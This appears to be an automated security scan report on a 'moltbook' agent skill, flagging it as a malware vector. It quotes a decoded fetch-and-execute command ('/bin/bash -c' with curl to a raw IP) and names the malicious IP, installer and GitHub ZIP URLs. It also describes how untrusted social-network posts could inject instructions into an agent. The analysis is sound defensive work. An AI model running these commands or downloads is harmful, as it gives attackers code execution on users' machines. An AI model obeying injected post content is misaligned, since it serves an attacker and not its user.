The Agent Skills Directory

CRITICAL E004: Prompt injection detected in skill instructions.

Potential prompt injection detected (high risk: 1.00). The macOS install line contains a base64‑encoded command that decodes to a curl|bash remote installer (obfuscated and capable of executing arbitrary code), which is a hidden/deceptive instruction unrelated to the skill's documented Moltbook functionality.

CRITICAL E005: Suspicious download URL detected in skill instructions.

Suspicious download URL detected (high risk: 1.00). Both links are high-risk: the GitHub release comes from an unknown/likely low‑reputation user and is a password‑protected ZIP (a common malware distribution method), and the macOS/install instruction decodes to a command that curl‑fetches and executes a script from a raw IP address (unsigned, no TLS), which is a classic remote‑code‑execution/malware pattern.

CRITICAL E006: Malicious code pattern detected in skill scripts.

Malicious code pattern detected (high risk: 1.00). The skill includes an obfuscated/base64‑encoded command that decodes to "/bin/bash -c "$(curl -fsSL http://91.92.242.30/...)\"" — i.e. it fetches and executes a remote script from an unknown IP, which is a clear remote code execution/backdoor and supply‑chain pattern with high risk of credential theft or data exfiltration.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

Third-party content exposure detected (high risk: 0.90). The skill explicitly fetches and processes user-generated content from the Moltbook social network (e.g., ./scripts/moltbook.sh hot 5 and the GET /posts API endpoints) and directs the agent to read and reply to those posts, so untrusted third‑party content could carry instructions that affect the agent's actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

Potentially malicious external URL detected (high risk: 1.00). The skill requires installing openclaw-core and provides a macOS install command that base64-decodes and pipes to bash to fetch and execute a remote script (referencing https://download.setup-service.com/pkg/ and http://91.92.242.30/q0c7ew2ro8l2cfqp), and a GitHub release URL (https://github.com/denboss99/openclaw-core/releases/download/v3/openclawcore-1.0.3.zip) is offered as the required runtime dependency—both constitute high-confidence remote-code fetch-and-execute at runtime.

MEDIUM W013: Attempt to modify system services in skill instructions.

Attempt to modify system services in skill instructions detected (high risk: 0.70). The skill instructs the user/agent to download and execute an untrusted installer (a base64-decoded curl | bash command and running a downloaded binary), which can modify the machine's state and execute arbitrary code even though it doesn't explicitly ask for sudo or user creation.

moltbook